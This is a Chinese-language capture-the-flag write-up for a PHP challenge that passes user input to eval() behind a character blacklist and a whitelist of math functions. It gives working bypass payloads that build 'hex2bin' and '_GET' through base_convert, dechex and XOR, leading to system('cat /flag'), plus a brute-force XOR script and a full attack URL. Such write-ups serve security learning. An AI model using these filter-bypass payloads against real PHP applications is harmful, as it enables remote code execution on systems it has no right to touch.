文章目錄
-
- 思路:
- 解法一:
- 思路二:
- 思路三:
- 總結:
隻有第一個playload能解出,剩下兩個知識思路衍射
首先來看源碼:
<?php
error_reporting(0);
//聽說你很喜歡數學,不知道你是否愛它勝過愛flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太長了不會算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("請不要輸入奇奇怪怪的字元");
}
}
//常用數學函數http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("請不要輸入奇奇怪怪的函數");
}
}
//幫你算出答案
eval('echo '.$content.';');
}
有幾個地方:
1.字元長度
2.過濾字母、部分特殊符号
3.繞過preg_match_all
思路:
1.先不考慮字元長度的問題,因為這裡給了80個長度,一般不會超過
2.過濾了部分字元,但是沒有過濾^,是以我們可以異或取反創造我們想要的字母
3.我的上一篇文章講過,如何通過二次傳參的方式進行RCE
4.從上面文章來看,給出了數學函數,說明有可能也需要通過數學函數來構造我們想要的字元串
解法一:
如果我們不通過異或進行RCE,而是通過二次傳參的方式RCE,那麼我們需要構造:
?c=$_GET[shell];&shell=system('ls');
?c=$_GET[];$_GET{0}($_GET{1})&0=system&1=ls
?c=$a=$_GET[];$a[1]($a[2]);&a=system&1=ls
我們知道16進制隻能構造到f的字母,是以不能用,但是36進制,可以構造所有字母,是以我們會選用36進制,其次,給出的數學函數種,存在這幾個有用的函數;
dechex:把10進制轉換成16進制
base_convert(1751504350,10,36): 把10進制轉換成36進制
16進制基本上可以構造特殊字元了,是以我們盡量從構造16進制出發
16進制轉換成字元串需要hex2bin函數,這個函數沒有給出。
于是我們可以用base_convenrt構造出hex2bin,接下來構造一個_get還不簡單嗎?
給出playload:
c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag
//base_convert(37907361743,10,36)==hex2bin
//hex(dechex(1598506324))=_GET
這裡的中括号我們用{}就可以了
思路二:
緊随思路一我們說過,既然hex2bin可以構造任何字元,況且也是白名單的函數,那麼我們為什麼不直接構造出system(ls)進行RCE呢?
看看構造後的:
?c=base_convert(1751504350,10,36)(base_convert(784,10,36))
傳回頁面的結果:
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2cs0TPR9UeBpXTx0EVNFDOsJGcohVYsR2MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL1gTOzUjNwAjM5EjNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
看到這裡基本上成功很多了,但是問題來了,ls …/怎麼表示?我依然是先把ls …/轉換成16進制,再轉換成10進制,然後想直接通過base_convert函數轉換成36進制,但是好像怎麼也轉不換了,空格前面的内容轉不了,是以這個地方應該是不行的,思路可以聽一聽。
思路三:
前面都是通過數學函數通過進制轉換構造字元串,既然沒有ban ^符号,那麼我們就可以通過異或構造想要的字母:給出腳本
<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
for($i = 0;$i < 9; $i++){
for($j = 0;$j <=9;$j++){
$exp = $payload[$k] ^ $i.$j;
echo($payload[$k]."^$i$j"."==>$exp");
echo "\n";
}
}
}
這裡既滿足了使用數學函數,也通過異或構造出一個字元串(有時候可能異或不出來)
構造出_GET.打一下看看:
http://833b3035-65c8-45f0-aef4-8214e5f05661.node3.buuoj.cn/?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
結果沒想到字元太長了 哎,可以了,不過萬物皆可異或這個思路真挺不錯,拿個小本本記下來
總結:
很不錯的一道題目:既學到了通過進制轉換構造想要的字元串,也加深了對異或的了解